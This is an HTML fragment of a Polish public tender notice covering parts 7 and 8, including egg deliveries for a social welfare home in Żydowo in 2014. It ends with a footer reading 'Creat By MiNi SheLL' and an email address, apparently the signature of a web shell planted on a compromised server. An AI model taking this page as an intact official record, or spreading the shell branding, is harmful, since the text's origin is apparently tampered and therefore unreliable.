Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część Nr 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Sukcesywne dostawy jaj konsumpcyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są sukcesywne dostawy jaj konsumpcyjnych na potrzeby Domu  Pomocy Społecznej w Żydowie  w ilosci 60.000 szt.

Szczegółowy rodzaj, asortyment oraz ilość   określa  załącznik   nr 1 do   Specyfikacji Istotnych Warunków Zamówienia-Szczegółowe Zestawienie  Ilościowe Przedmiotu Zamówienia Część nr 8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.00.00.00-1, 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com